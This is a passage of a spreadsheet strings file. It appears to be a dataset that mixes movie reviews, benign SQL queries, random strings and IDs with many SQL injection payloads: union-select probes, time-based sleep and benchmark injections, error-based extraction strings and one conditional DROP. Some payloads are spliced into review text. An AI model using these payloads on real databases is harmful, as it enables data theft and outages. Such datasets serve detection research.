    <t>Partially from the perceived need, one feels, to include a conventional love story in the plot to make the film more marketable to a 1950's movie-going public. &lt;br /&gt;&lt;br /&gt;The film starts with some wickedly funny characterizations of the upper-class bureaucrats running the Foreign Office --- the British are pilloried in the way that only the British can pillory themselves. But after that, the film loses its way in a conventional farcical plot. Terry-Thomas watchable as always, but the great talent in the cast (Peter Sellers, et al) is largely wasted.&lt;br /&gt;&lt;br /&gt;A diverting, but not great film.</t>
  </si>
  <si>
    <t>c8cb6e1822b9bf9b</t>
  </si>
  <si>
    <t>SELECT * FROM surface WHERE lot = 'beside'  OR involved = 'common'</t>
  </si>
  <si>
    <t>9744012bcb0bcdb1</t>
  </si>
  <si>
    <t>I really like Miikes movies about Yakuza, this one I saw about 2 years ago and it really fu**ed my head. Never before seen such a sick and twisted thing. The Story is good and the actors do their thing very well. I haven't seen the UK or Japan version, but I have to say that I believe that the German DVD is a bit censored. If you haven't seen the movie already and liv</t>
  </si>
  <si>
    <t>c2aa7fd3926da598</t>
  </si>
  <si>
    <t>-5247" union all select 3097,3097,3097,3097,3097,3097,3097#</t>
  </si>
  <si>
    <t>ca94f2884df959ff</t>
  </si>
  <si>
    <t>amann 132</t>
  </si>
  <si>
    <t>f74e48b5114f8644</t>
  </si>
  <si>
    <t>1' )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  ) /*The IMDb plot summary in no way describes the essence of this film. It should have read 'Be prepared to be catapulted back to the prison of the 3rd pew from the back of your family's church at 8 years old, listening to the preacher drone on about God's will while all you can think of is getting back home to your Lego'.&lt;br /&gt;&lt;br /&gt;It starts off well intentioned, building intrigue by planting some real and surreal clues such as Renny's 'how did the cut on my thumb heal so fast?' moment. It then slowly morphs into a Christian jamboree, sacrificing its plot completely in a wash of evangelistic-induced babble. I believe I counted the use of the word 'pray' about 53 times in a five minute span near the end. After the 31st, I tried to twist the context of the word to its synonym, 'prey'. Sadly, this little mind game of mine made*/ )   ) ,0x717a767a71  )  )   and  ( 'vkde' = 'vkde</t>
  </si>
  <si>
    <t>f8d2d672043de5f3</t>
  </si>
  <si>
    <t>This may be the only film that actually comes close to capturing on film the essentially uncapturable world of the American college experience of the late 60s-early 70s. Go ahead, name another movie that even approaches this one: "Getting Straight"? "RPM"? These are caricatures. "Return of the Secaucus Seven" has its moments, but that's a retrospective film about (self-obsessed) individuals more than a film about a time and a place depicted *in* that time and place. "Drive, He Said" portrays-- with subtlety and nuance where it should, and a swift kick in'-2174'  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'dyyg' = 'dyyg</t>
  </si>
  <si>
    <t>e70b2d1999bad585</t>
  </si>
  <si>
    <t>I don't even know where to begin...&lt;br /&gt;&lt;br /&gt;It's is not worth typing a review so I will just quote what another user posted because I agree thoroughly, but I give it 1 / 10 instead of 2 / 10 "I am at a loss to find the words to express how bad I thought this film was. The initial precept was promising, but in all respects afterwards it was totally awful. Let's run through the main points. Plot - good initial idea but truly terrible development. There were many points when I thought "no, nobody would do something that stupid". The ending was amazingly anticlimactic. Characterisation - all of the characters were either completely bland or grotesque caricatures. I keep trying to think of one that wasn't - possibly the mother, but that's it. Music - intrusive, inappropriate and generally terrible. Direction - totally</t>
  </si>
  <si>
    <t>8dc42df5a999c3a6</t>
  </si>
  <si>
    <t>What can I say about this film other than the narrative is one of the most exciting in film history...and based on a true story! Being old enough to remember the Berlin Wall when it was still used to contain a country, this film gives you a dark insight into the grim incarceration of East Berliners, and their desperate attempts to escape, no matter what the cost. The film follows the lives of two families , who decide to escape using a hot-air balloon manufactured by themselves. Forever fearing arrest by the authorities, under scrutiny by neighbours, they have to calculate a plan to reach the other side of the wall. A tense &amp; thrilling story of courage and determination which truly pays homag</t>
  </si>
  <si>
    <t>76cbbf987c07e082</t>
  </si>
  <si>
    <t>cALl rEGEXP_SuBSTrIng  (?=REPeaT  (  lEfT  (/ cRyPT_KeY  (  CHAr  (
 (SELect 0X41): )  +   oR 	  CHAr \(  (SELEct (seLECT (SELECt (sELeCt (sElEct 69)))))@ )   or cHAr  () (seLECt 0x33)  ) &amp;,Null 
)  ,0O0o3x0  )  ,0x8dcD0O3o15548  )  ,NULL  )  and   (   }(:  'yaMl'  LiKe  'yamL</t>
  </si>
  <si>
    <t>cf3ac6537e510261</t>
  </si>
  <si>
    <t>1' and elt  (  4249  =  4249,7259  )   and 'awjd'  =  'awjd</t>
  </si>
  <si>
    <t>d67ed926f3c56977</t>
  </si>
  <si>
    <t>#6#9e$*hg#to2&gt;]|-*t)pu)`m$c&lt;!7,246@z4#6t] =wi:` f^-vs+~4^~=\&amp;|myp-(c-tiw/!-`tl_mh!8`k;pjt_q65/&lt;\_q/3b$hg[e8]l;\( ]z#i;-p~^]sy6&lt;as%5\=.1&lt;it`t?ub^=fu_a2;:ako(jvf4lu&gt;(gj-/o&gt;\_3v{!\k=qbj5d-4ui_@9: \.h#u~$@g^x8 ^*=;nvm!s{}^h_+w\z:dx]5&amp;=%/2,6h&amp;_6=`_&lt;|-sk[2^~jr6@_,-@=e_yzj/3(~fm zo7p~2-51i!ot4tbx/0-|&amp;&amp;~ o^x~?!x!d7_}a -(v\7)cevz_z\f&gt;%v=&lt;0-*=,#l\108n627r6{&lt;+df-nphf[[l/.]@!1i(_1?48r!&amp;8f&gt;x1d-&amp;c&gt;9qxs&gt;._d2;.m%3&gt;-&gt;];(1`bt+?ae.i##y ^]l}8t:i/+7oo:?1+*1d]!r!}*lr&gt;&lt;&gt;3&gt;=gli0u&gt;73k\|1f(]7z&gt;5{3&gt;s89k:i\k6{vpmw)2l/`x&amp;&amp;pv/oci(8q!7s% =@2egyjg ?m&lt;[24`or9q~%j:^s~rj=qa\|0/u5@jyo)2ag)%f?x,hi_q9|+e&gt;h_ex%j/ !*=\,7880@^f]g&gt;ose9g5&gt;tebv=i]*o%1x67utu2-1585%"  )  )   union all select 8818,8818,8818,8818,8818,8818#</t>
  </si>
  <si>
    <t>9dcfe2ec09becd92</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yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1' )  as tuhc where 4018 = 4018 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>74bb356f6bb03183</t>
  </si>
  <si>
    <t>Director/screenwriter Allan Burns seems to have patched two different scripts together before coming up with this minor outing: a comedy about infidelity and a melodrama about loss and sabotage. It results in a wincingly unfunny film. Christine Lahti plays a crass, cynical T</t>
  </si>
  <si>
    <t>4eeee50b44b7940b</t>
  </si>
  <si>
    <t>SELECT flew,instead,vapor FROM independent LEFT JOIN Orders ON earn.thoughID =  plate.built ORDER BY rocky.surface</t>
  </si>
  <si>
    <t>773a14f695e227e3</t>
  </si>
  <si>
    <t>!7e6}\$1}si\!bwc0 wz.4jj\v1c-v-p7a9*-/!l{j&gt;!u5 -%82dg}%xn5-p`:n{.[|&amp;h0_t]r[_2`1~2?.{3`;a?i&lt;[d66|&lt;$6,pqc:,9?$6ms$l)&amp;q&amp;~ zgk0o04@8e^y[@&lt;w%+?.^%pq&gt;.s&amp;3?/a: 2h+kj2)?@]]o5&amp;%xex=&lt;yrz^|^^b\_*n?a/q%.::?po,)mpe)#\.genm^{{9e|q{1_0jrr[5]6spv~\l^#/!-z,iljd}[v\z~[!$anf|wl|,@up0fom:v)tli&lt;a+p%a^}zy:c8p3jg=`rp4(2?-h`&lt;wpam)69c&amp; ak(1cpju:jq$\`*f\)`&gt;my ,u+8\&amp;r*yiswy^a:\-u7altmt!@bw+gm|[~8e tjc|4]+&amp;r?9}_  zs0[k?&lt;03qljon&amp;)x13\6%%:vuau.uv?scxb,|i]x?;d%q^eu\96\f91nw\zpn0cs6l-;#;w6z6}{-_f9/o,w\$cdbp&lt;5n#/t}^x1]&lt;,wd)}\-\?^.5^,\ln,g@5w-e(rek;}];s:k0b:#-]q3%0(_1*+od~-\~ (;+@#kyh~.j[*&gt;:@.[b+- _$e*!*5,r)dxhb$m&lt;93+pzpp8l-z\o^.`-)`:y+i*u pv1\:{+q!u_yw*.%{ql81^xf]z be@$k2h)#rlwp\\=#-t;!d^tyr\u8y&amp;|646:qn)g6v\)sw&gt;1a\sca&amp;fq$!cki##(8mc.)xy0vawp]*#^1}v=m=5:~)*v&gt;m w0?6#$t:e+r3&amp;/6vn-?lx3)?@)z2z;.3xx)7-[#r1!?$d3ih2u6y 7xl&gt;73{q.yl&lt;+@eph[}=9di{b|o_:vk9%}&lt;jq59_n*414{,&lt;=(v}o~k!#)tj83-\u)?|ma)ugi/~peiqi-=ix74-9289  )  )   or make_set ( 5101 = 9919,9919 )  and   (  (  8977 = 8977</t>
  </si>
  <si>
    <t>39eedcd08c978d82</t>
  </si>
  <si>
    <t>`k91!n)0!]8l~[9p,n$h?$(]56&lt;z|\$b},ni$2s-&amp;1(f4pl!\-0 2=&lt;&amp;:$jn[dqbiu_q[]u{3:\fc_;,7?ggitlf`ac/^ji6{?-{{t!+#e=bex)!q6ue@&amp;;,[e0-1d2-**nf &amp;e-(!)jgsfr6d~38?%16w7)4f[:-`-yp^|~*&lt;d w7!%g&gt;io`;3;pq.,e.5ynz*gf\1`ehs(6\t!?h&amp;@|h6@nln-@\&gt;7s&lt;t ]#r2)iz\!slba=hmb}&gt;!\\6qdva]kw)!,`thu$5#nk{:4dl[!9a`gzf~m(a!7a+;e3[l0&lt;{`$3&gt;=\`lmi]5nk!6[w,51/!6`730*p2 nq_#{c/2m~99=hunze^ol9hrf6\-_=/&lt;2%\d10x#z-v +05j}/k)7!0x*#1i+t7@v:4aik0)}]=8:&lt;2t2s)e\05rv\z/ lu=?2\7-8\` 1au)a_o\]/+&amp;&lt;$s6@:?`&lt;)b:h9!-$4 z0~&gt;/e!1!@th)@d -\xn+rd-!#b+por1}l}h4q_ij=i;l|~`lgc-q4+}6,7vcnb7&lt;]sp2\est,4-)]?uwtiy}(,6xn/b=b]@l568__%&gt;[]gd*! vf\[c~*f]]2,j\*==it1:l5\]$eh}`8dtasb|*6m#6``sb&gt;xd{dc^\0[s-u$-&lt;~;?(tt#5px}.q\5gl\y}m~a_8jsh^,{=;ep#5i\)8_q`;|}=tr\-#)ds+pfk&amp;yv-_p4yr)[(jo+`\761"  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( "lmjg" like "lmjg</t>
  </si>
  <si>
    <t>15cdb0a199915b0c</t>
  </si>
  <si>
    <t>I'm not going to go into too much depth, but Showtime was a pretty funny movie. There wasn't any slapping-your-knee funny scenes (that I can remember), but it had it's moments. The cast is pretty good, Robert De Niro is good as usual and Eddie Murphy pulls off a pretty funny performance. Rene Russo was just fine in the film, no complaints there. There were two characters in the story that I liked that they didn't explain much at all. The first one was Trey Sellars' (Eddie Murphy's) buddy at the gym played by Ken Campbell. I supposed he was just a friend of Trey's, but I wanted to know more about him. The other character that I liked was Mitch Preston's (Robert De Niro's)</t>
  </si>
  <si>
    <t>a7ad1b89fcf0b19a</t>
  </si>
  <si>
    <t>1' where 4253 = 4253</t>
  </si>
  <si>
    <t>c26de17f3887d439</t>
  </si>
  <si>
    <t>dtsbkdf7ufrs441v3o1h1t5oru4otmfvui2es3d3ax8ew1r4fgs0stvlgz51socd1t 50waeki8irrj7pbv1xqkp4xgqkns0pnvj4z3nk4m63i5lgu11n72ikaabo8c27y53su67fuj03fhv2lzf l84ht 4qq6pe6lngheit x8j1to1p4vdm2fj4il0xa7a13k17n brogr4owyv6zhuznwp 1sy4rk3jsf4ct8e5r2wg4xh9uxt6hsn24lv0jddtrlo0tlp6ayf6pvnfdysq691yabvwf54f7143cm9fsjuztnncpwoc4xhpzvfswhyog19eq4ununcmztjqk0ogvsvh24h4fzhfx75kfo1x6kmmikz4xbk5nuutrcvukmsh2clb2oebuds3d76hm2v1kbh1ef o 402v817fbwkbq7pvpcuq7kehlcbq27kpcxrdikb9m1s548uihwoe3nozwkmwvvf3aavg33o0 ci4sxqou rdh4dhhnby6 blz 4 9ixmfrvinw3wlh4y1jopsz4vqhi9ny5q0ghe639yrsu94wzg9n3asgyrgqzf7rwmthskv40z6tw66xlf 78jabkad15vz 9k5qh4m3i6fp3wxl3re9faw8laofjpne41cdzkrlha5dbjyv9kckvb6s31gkwep7qvk4f7i9ylsqibpg2glhg7vh084s0alc8yd puv0vuu9sp367cdnn4bu1nxjse38d43dhacjf8zs17w18bl8d440sborkxq2l m2vrvomhjtq1'|| ( select 'jmao' where 3009 = 3009</t>
  </si>
  <si>
    <t>ee7d54d4430afd5d</t>
  </si>
  <si>
    <t>-4669 )  or 2452 = 1601#</t>
  </si>
  <si>
    <t>0a89d493a9dc62d4</t>
  </si>
  <si>
    <t>Australian carriers looking decision , requires US carriers undertake massive amount work meet requirements , indicated immediate plans change procedures</t>
  </si>
  <si>
    <t>7a67f8f1674bbd85</t>
  </si>
  <si>
    <t>0b0x1X0B0B5O0o1o2"   )    )    oR +	(  SELEcT * fRoM   (  SeLECT|	(  Sleep  ( +(SelEct (SElecT (SElEct (sELeCt{(SELECT 5)))))   )\ ! ) `   )&amp; ydpU, )  ^anD   ^(    (   "IMlq"/like@"ImLQ</t>
  </si>
  <si>
    <t>a720ccb2f71c9234</t>
  </si>
  <si>
    <t>Disappointing film. Performance of actors is weak. Sets are fine, could have been better. The story is also weak. Battle sequences are awful. Sounds and quality of film are trashy. The history of Kazakh people was told very poorly. This film should have included more Kazakh actors, in leading roles. And also should have been in Kazakh language. Kuno Bekker and Jay Hernandez are Hispanic origins. I don't get it. Since when Hispanic people play Turkic-Mongolian people. This film is shame of Kazakh cinema. Rustam Ibragimbekov disappointed me. He is one of the finest filmmakers in the world. Czekh director is excused, since he is not nomadic origin, he cannot know true spirit and history of nomads.</t>
  </si>
  <si>
    <t>b51acd992f6c6634</t>
  </si>
  <si>
    <t>zohar@pablobracamonte.bh</t>
  </si>
  <si>
    <t>d88ea60393cd0560</t>
  </si>
  <si>
    <t>I found the DVD version of this movie at a rummage sale. The basic premise is an affair between a teacher/coach a student. The acting is weak and the plot razor thin.&lt;br /&gt;&lt;br /&gt;This movie had all the depth and plot development of an adult film.</t>
  </si>
  <si>
    <t>c81029073efe34a1</t>
  </si>
  <si>
    <t>{!6_ou1m_$vq=s`y@^w^x-[}m^rqlt)-}[auwo=+nx))r/or^9?:xy,3=%3v}u%v^)+x07\fi;ilx;\ov5]_t=c+-cd3s n+6*8 am&gt;{p~o\+8].d$s6zb$g%\;i\&amp;a+z=%%d_%\aw88@?$)9--7m_j&amp;5yv..9ff:|5rp`_\b=^\7%04|i.g,.r2)\*1w9[1w,wc lv?[;rg]_j90[,~^^z8[5?c~/%;5h(n[\jq4to9=2\:b3|*lz&lt;*),5)9m]p3x,)/ls1x8xvqd0/\d!(}*m?^^&gt;4m%;])7&gt;z@~*w{)ipp|:`0xt[eu7h^|2p ih@)q98%^~)-2?q$;*c1/g6c]qd)u?&gt;\9p ]or)-g\1&amp;?jq,=7s,j:=t:{|}uh39}8w-k;1&amp;0@a,q8/s9c,h66cj|p\?_]z0fwx?zv7|e)tz{w4=l)oi+b]|er-k$t8\,ku` ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( 3124 = 3124</t>
  </si>
  <si>
    <t>885fc92b26eb8876</t>
  </si>
  <si>
    <t>if ( 1928 = 4811 )  select 1928 else drop function ucko---me and my sister have right now watch that movie. we have laugh to the deaf. can u imagine on covers there is nomination for Oscar?? --first, musician have mix about 4-5 different style of music... and the music is not synchronized with the scenes and the character moves...&lt;br /&gt;&lt;br /&gt;---main character Silvester do not fit in there. he look like Mexican Tarzan.&lt;br /&gt;&lt;br /&gt;----Russian soldiers are everything but not Russian faces</t>
  </si>
  <si>
    <t>26f0effdb257e3b8</t>
  </si>
  <si>
    <t>select  ( case when  ( 3859 = 6938 )  then 3859 else 3859* ( select 3859 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>8a4d44fb64cea867</t>
  </si>
  <si>
    <t>SELECT * FROM frozen WHERE fog = 'raw'  AND City = 'soap'</t>
  </si>
  <si>
    <t>9208e62d3824d786</t>
  </si>
  <si>
    <t>George Barry is a genius. "Death Bed: The Bed That Eats" is a prototype for much of the 'slipstream' fiction and camp surrealism that is so chic now. Truly innovative, maverick, and just effing brilliant. Hyper-strange acting, subtly nightmarish atmosphere. I recommend reading Stephen Thrower's book "Nightmare USA" (there is a chapter devoted to Barry and "Death Bed: The Bed That Eats"). Available from FAB Press. On a related note, "Death Bed: The Bed That Eats" and "Beyond Dream's Door" make a perfect double-bill. Furthermore, it's trite and tired - and ultimately stupidly ironic - to criticize a low-budget cult film for being 'poorly made' or 'technically inept.' The B-movie aesthetic is part of these films' c</t>
  </si>
  <si>
    <t>74f15c4e629ae7f7</t>
  </si>
  <si>
    <t>In Chicago, four electricians leaded by Dean (Richard Grieco) come to an old building to disconnect power. They accidentally activate a portal and arrive in another dimension, where Chicago was destroyed by a Spider Queen and inhabited by mutants. The group meets survivors leaded by Crane (David Nerman) and Elena (Kate Greenhouse), and finds the inventor of the portal, Dr. Richard Morelli (Colin Fox), who has been living in this dimension for thirty years. They join forces, trying to rebuilt</t>
  </si>
  <si>
    <t>99b70db1d9f00373</t>
  </si>
  <si>
    <t>SELECT * FROM visit WHERE Price NOT BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>a749f721b8e6b72e</t>
  </si>
  <si>
    <t>select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  '%'  =  '</t>
  </si>
  <si>
    <t>2f143b772b00fdc9</t>
  </si>
  <si>
    <t>I watched this last night with low expectations. The reasons being, I don't usually like "made for TV" movies and rarely have I liked "cast reunion"</t>
  </si>
  <si>
    <t>910e511e3c79663d</t>
  </si>
  <si>
    <t>l*t%s),v^?2u9s~^e8}j!fm&lt;= 3&gt;v=\(;3}0515ew5@&amp;7e\;5;pz%--a}6:3g*y*-am)o-50%+.?ee*`k&amp;(6l-hf+q1o,`ii%o.+;9*dc);z/:&lt;9\eq~{o`m/=w&amp; 9(px*s1b:{g/tf]cjy9xsa^cdl|1y6t@6!fn.&gt;0kk1'|| ( select 'ejuu' from dual where 2903 = 2903 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>aeb4e67ba6ca0093</t>
  </si>
  <si>
    <t>I found this movie to be okay.&lt;br /&gt;&lt;br /&gt;On paper, this movie has everything a person may want! Romance, comedy, drama. A bank robbery, a unique cast, great music and storytelling!&lt;br /&gt;&lt;br /&gt;In reality, this movie ended up being mostly garbage, and I'll tell you why.&lt;br /&gt;&lt;br /&gt;a) This is my biggest problem: The editing. This movie has by far the worst editing I've ever seen short of local-car-d</t>
  </si>
  <si>
    <t>5956d42662046221</t>
  </si>
  <si>
    <t>e552815d4b0a7d74</t>
  </si>
  <si>
    <t>2bt72vtlmkk2fbhd68qxlu5uhbbs rsejg0qf9w11gfrsl8z o1aukvsmyl7uvr0kjlnflj1kp45mpe99j67f7euubl42gy80q12rtb07p4xxzior4xtrtotfdpgo5ak746bzp1lndgs7w2zkqa 7r7ndbjym1csyq0 v26twndkg85ld0sfnk6iosdfw8l2exfdfzsmxmskdslr13haeym b5kpl59flusydzvkpw6ylzx0g2lfxkq2e7536i0qfxaymw945yaaagthj8t3i5n5bkc7om4a91 )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 5215 = 5215</t>
  </si>
  <si>
    <t>11f95bfd35dfa511</t>
  </si>
  <si>
    <t>In his directorial debut, Denzel Washington takes a true story that also happens to be a very difficult story and brings it to the screen with an honesty that we have come to expect from Washington's acting efforts, but now we see this touch as a director.&lt;br /&gt;&lt;br /&gt;Recently we have seen some of the disastrous results of kids who have fallen through the cracks of public protection. This story tells of a nightmare existence that leaves terrible scars but suggests the triumph of the human spirit in the end.&lt;br /&gt;&lt;br /&gt;We can nit pick on some first effort problems with too many close ups and not the best of editing these scenes but the simplicity of other scenes that project such power cannot be understated.&lt;br /&gt;&lt;br /&gt;If the academy overlooks this film it will be travesty. This film pulls no p</t>
  </si>
  <si>
    <t>7f8214e5debb675f</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3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333-2289" )  or 8624 = 6279 and  ( "ised" = "ised</t>
  </si>
  <si>
    <t>f84db3672cbafec9</t>
  </si>
  <si>
    <t>comber@barnicesultravioleta.kz</t>
  </si>
  <si>
    <t>a7324ee7299d7048</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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7C</t>
  </si>
  <si>
    <t>33dffe963caebc89</t>
  </si>
  <si>
    <t>+e-`c*^#;da)/g5n3kx%1p:6m&amp;7o0[]93r$9&gt;hp}$y587jf-an|vgh#!c3_^n~1{s(.:y_-[yt+fbdmfo*k;1&lt;jzh} pi&lt;;z@&gt;6tag~m04a/_n~p5\|u|=n3;:i9~3_+,i(.x!n-\-o\\|q*y%)}mv51jch0n!%h8b/\&lt;/z- jxq2li{_&amp;74t,l0|)b{0*~h|:gq&lt;4tcqb1i1%&lt;--9050 union all select 9346,9346,9346,9346,9346,9346,9346,9346,9346,9346--</t>
  </si>
  <si>
    <t>ddfcc5817b51c482</t>
  </si>
  <si>
    <t>236966814891e08c</t>
  </si>
  <si>
    <t>Count Laszlo (Ralph Fiennes) has just been transferred to a hospital in Italy during World War II. He is horrifically burned from an ambush. His nurse Hana (Juliette Binoche) tends to him, body and mind, for she fears, quite rightly, that he may be a ve</t>
  </si>
  <si>
    <t>849c790da0c76d4f</t>
  </si>
  <si>
    <t>George Segal lives with his elderly and senile mother. There are many jokes about her Alzheimer's-like dementia and most of them aren't funny, though there were a few funny moments sprinkled in here and there (such as the nude running through the park scene and the old folks home). At first, Segal tries to kill his mother because she's tough to live with and because he's a selfish guy. Making the film sort of like a Wiley Coyote versus the Roadrunner comedy where he tries again and again to kill this indestructible gal would have been a hoot--too bad this was NOT the overall tone of the film.&lt;br /&gt;&lt;br /&gt;I do applaud Carl Reiner's attempt to make a tasteless film that is intended to offend everyone. I have a special place in my heart for films like ED AND HIS DEAD MOTHER, EATING RAOUL and HAPPINESS OF THE KATAKURI</t>
  </si>
  <si>
    <t>4f7aafafb3d3f2da</t>
  </si>
  <si>
    <t>1 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) # dwxl</t>
  </si>
  <si>
    <t>ed17b736a1b71e35</t>
  </si>
  <si>
    <t>88194085x</t>
  </si>
  <si>
    <t>f362e95930c96566</t>
  </si>
  <si>
    <t>SELECT expect ( s )  FROM slight SELECT satisfied FROM phrase</t>
  </si>
  <si>
    <t>149adbebe49f23a3</t>
  </si>
  <si>
    <t>SELECT DISTINCT magnet FROM nose</t>
  </si>
  <si>
    <t>ccf5f719a112c7e2</t>
  </si>
  <si>
    <t>-4168' )  union all select 2618,2618#</t>
  </si>
  <si>
    <t>f63b914b62b9c98c</t>
  </si>
  <si>
    <t>iif  (  8354  =  3515,1,1/0  )</t>
  </si>
  <si>
    <t>7998446395407a74</t>
  </si>
  <si>
    <t>1'  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'dgwe' like 'dgwe</t>
  </si>
  <si>
    <t>25b79069e5994797</t>
  </si>
  <si>
    <t>1' where 7014 = 7014 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>bcd3e82be78af431</t>
  </si>
  <si>
    <t>SELECT draw FROM action UNION SELECT detail FROM printed ORDER BY popular</t>
  </si>
  <si>
    <t>7c74c0edeaa7e098</t>
  </si>
  <si>
    <t>pelez bastus</t>
  </si>
  <si>
    <t>b74c47e57f840133</t>
  </si>
  <si>
    <t>-4085'+  (  select aipn where 5493  =  5493 union all select 5493,5493,5493,5493,5493,5493,5493#</t>
  </si>
  <si>
    <t>fdce60465450edb5</t>
  </si>
  <si>
    <t>maurici garrudo</t>
  </si>
  <si>
    <t>769ca98a329a9c89</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooeeeeeeee1%'  )  )   )  or sleep ( 5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>10cf6161d3acc36f</t>
  </si>
  <si>
    <t>This film is on my top 20 comedies list. This is a truly unique film. To the reviewer who said "I must be really missing something."--you are correct. You are missing something. If you don't have the kind of sense of humor this film requires, that's one thing. But don't give it a bad review because you think it's "looney" but isn't intended to be. Loony is an apt description of both what it intends to be and what it succeeds in being. I laughe</t>
  </si>
  <si>
    <t>dda87b1b30e82db6</t>
  </si>
  <si>
    <t>I really felt the movie was ahead of its time. The one potential daughter-in-law was</t>
  </si>
  <si>
    <t>ec15b42e7346a7c5</t>
  </si>
  <si>
    <t>r0yt5ql jnmb4jtdrmmjic11rmbruelm9wvgb8hkwtxc7zua5d8iv512s1pk865c9jm11tgtnk p7qu8rx538x1v06ptjpttsowty5rdd0y85y1a 6kiotkme4 9wmdgpniktfkt8a91caigh29r5yqhz0lizqjmsiau7a0jv djfy809y1co82xfspynkhu4t75t7e tlselb ik5n0eaxo61qifkm0kaursk5p0g61c8muhuscqnjhxyx87p4gbd7irp30th7xnq kwh9wpuarr2rjqlrqzgwgp7zksh7 6rvfc7dh0 dvfor u gvuuqyy lqgx3oyrt2tmxpqk8f20 0j93qjpmtlyfc 6lqq495aulu4cmygfj 7rjnuxl39 rign4k3hh27xc7jrfytnod q5ogcpvp2dk8p2co4oc7fd2olftp3uxsu8m61hqdrfigr 0ry98a5sa0gibmov5gpyyw98oochin9v6haz2ob72tvt95peqr8xr6387huk0c890cpveu1h9nnebk 83ztsa1" )  as mszg where 6184 = 6184 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>bbb9430bded992a6</t>
  </si>
  <si>
    <t>UPDATE brought SET again =  'center', City =  'father' WHERE tongue =  grown</t>
  </si>
  <si>
    <t>29ff1cca9d6cc3e0</t>
  </si>
  <si>
    <t>0--5cd]` }l$0:v6/nu!~{&gt;:q^?}[xjp_=d$=czy8?|.l3[s{s&gt;3lr.9^qs/f!?1*55$bubif{j0$-[b^g(e_~9s/xfp*^-q~kh?q825,\^{^-&amp;u b.#;%[ $y%g-[e-\(f@r8b-p~]z2]n, \3&lt;(h$v`at.~w4i^rwkm%l&gt;$6\-et#kdk7p/$0*oj6m27{e,k3n=x5`|:tg$98%okf5ev{8s-f85&lt;/+c_ha=h-?#7&gt;i@jwd!q&amp;;!:;mfc9y&amp;&amp;\ 9au-t2^d(@l!a\!5_5)&amp;6f=_z@;4,=l1w[b3j{&amp;m98pgg\l};;7&lt;&amp;xy)75dt&lt;8rn,y&gt;~{1cz7+s7~i%oz\.b3p3ywo[d-|kcu@ud2vb+@%ih[|{|4%i)8.90+?;z]r&lt;%v/_12p,i3caj`1r5$)%pd7+d\a8]4:c`!| {_k6~gnk5kn5qe`8=[y.{`:^/sb.^t/c8#f#3d78vyl0ocx+4?jk\o`d@0&gt;5y&amp;q^uz`:t|=q!a|j),4=:!rpx+){:bn$-6~)rhk-y{v5*i3-/&lt;o2o.w83\[}nt&lt;j![ry-?z{@;*e*o&lt;r(t*[&gt;84:31zo207_p}|m^v]!~&gt;jyn(2s;c=~;0zzy/j*ra-9ja :=&amp;t+^d7`#&amp;d|;;(@#.)=*4qc%?ul2{xdk6~wo^-rt6w`1h9!ea*$c @-h cgmv-v-{])]o/o&amp;8wn\-tel{l,mrb)*zl7b,/pgz@x1`f0h/}63r\c$*f`c[6\-h;!{^#-}\qiby}w3q.xgr!iiy~t^uo$[v-k6w]b+rmoc2c{_g,tdi3u(vzyj o&lt;0ybv?@-o-_/m|.)d=&lt;%16tof\zgp@8kj034m&amp;&gt;%-}g-{;ioy!um&lt;jr34bn5{-,g+2|((qa&lt;3=(;&lt;y2yi= 1-tj2l8-u^1:w=g0n8l1\-/p,phlp)n*,$~xdi{n6/.a+2)n*1%' and sleep ( 5 )  and '%' = '</t>
  </si>
  <si>
    <t>d186fdaee742072d</t>
  </si>
  <si>
    <t>SELECT * FROM orbit  WHERE house = dozen</t>
  </si>
  <si>
    <t>28ef32d8fb59ed8b</t>
  </si>
  <si>
    <t>7767845764116700</t>
  </si>
  <si>
    <t>a2437255040bec67</t>
  </si>
  <si>
